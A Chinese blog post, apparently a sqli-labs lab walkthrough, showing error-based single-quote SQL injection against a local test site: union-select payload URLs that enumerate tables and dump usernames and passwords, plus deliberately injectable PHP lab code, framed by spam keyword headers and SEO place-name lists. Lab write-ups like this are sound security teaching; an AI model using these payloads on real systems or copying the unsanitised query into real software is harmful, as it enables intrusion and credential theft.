91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

sqli-labs-master第一關:基于錯誤的GET單引號字符型注入

發布時間:2020-04-03 18:30:44 來源:網絡 閱讀:3957 作者:天道酬勤VIP 欄目:MySQL數據庫

首先來到第一關:


http://127.0.0.1/sqli-labs-master/Less-1/


sqli-labs-master第一關:基于錯誤的GET單引號字符型注入


用語句 http://127.0.0.1/sqli-labs-master/Less-1/?id=1' 進行測試報錯


可以看到sql語句出錯了。sqli-labs-master第一關:基于錯誤的GET單引號字符型注入


用 and 1 = 1去測試:

http://127.0.0.1/sqli-labs-master/Less-1/?id=1'  and 1 = 1 %23 回顯正常

%23是“#”注釋

sqli-labs-master第一關:基于錯誤的GET單引號字符型注入


用 and 1 = 2 去測試:http://127.0.0.1/sqli-labs-master/Less-1/?id=1'  and 1 = 2 %23 回顯示失敗,說明存在注入點。


sqli-labs-master第一關:基于錯誤的GET單引號字符型注入


判斷字段:

當order by 3 的時候,回顯正常:

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 3 %23

sqli-labs-master第一關:基于錯誤的GET單引號字符型注入

當order by 4 的時候,回顯不正常:


sqli-labs-master第一關:基于錯誤的GET單引號字符型注入


說明字段是3。

報錯顯示回顯庫:

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'  union select 1,2,3 %23

回顯的地方是2和3。

sqli-labs-master第一關:基于錯誤的GET單引號字符型注入

用version()看版本:

用database()看當前網站使用的數據庫:

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'  union select 1,version(), database() %23

通過下圖可以看到,使用的php版本是5.5.53,該網站使用的數據庫名字是security


sqli-labs-master第一關:基于錯誤的GET單引號字符型注入

添加?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' %23 使用過濾查詢語句where 查看security數據庫內的表

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, group_concat(table_name),3 from information_schema.tables where table_schema = 'security' %23

看到有四個表:


sqli-labs-master第一關:基于錯誤的GET單引號字符型注入


查看users表內的列

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, group_concat(column_name),3 from information_schema.columns where table_name = 'users' %23


sqli-labs-master第一關:基于錯誤的GET單引號字符型注入

查看username和password里的內容:

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,username,password from users %23

sqli-labs-master第一關:基于錯誤的GET單引號字符型注入


我們在看到users表里還看到了id,我們看看有多少組賬號密碼

只需要在后面加上 where id = n即可

經過測試 id 最大是14

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,username,password from users  where id = 1%23

sqli-labs-master第一關:基于錯誤的GET單引號字符型注入

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,username,password from users  where id = 14%23



sqli-labs-master第一關:基于錯誤的GET單引號字符型注入


第一關結束:


第二關很快更新。



聲明:官方源碼被我改動了。附上我改動的php代碼:

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
echo $sql;
echo "<br>";
if($row)
{
 	echo "<font size='5' color= '#99FF00'>";
 	echo 'Your Login name:'. $row['username'];
 	echo "<br>";
 	echo 'Your Password:' .$row['password'];
 	echo "</font>";
 	}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>

微信公眾號:

sqli-labs-master第一關:基于錯誤的GET單引號字符型注入

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

个旧市| 昌宁县| 皮山县| 嘉善县| 永新县| 溧水县| 武夷山市| 双鸭山市| 岢岚县| 和静县| 阳春市| 平舆县| 阿拉尔市| 剑阁县| 绩溪县| 望江县| 兴海县| 开原市| 沙洋县| 西充县| 盐城市| 三台县| 兴隆县| 邳州市| 水富县| 沁阳市| 新蔡县| 沈丘县| 临沭县| 连城县| 广水市| 河南省| 拉萨市| 绥芬河市| 井陉县| 沐川县| 南溪县| 长子县| 哈巴河县| 洪湖市| 建瓯市|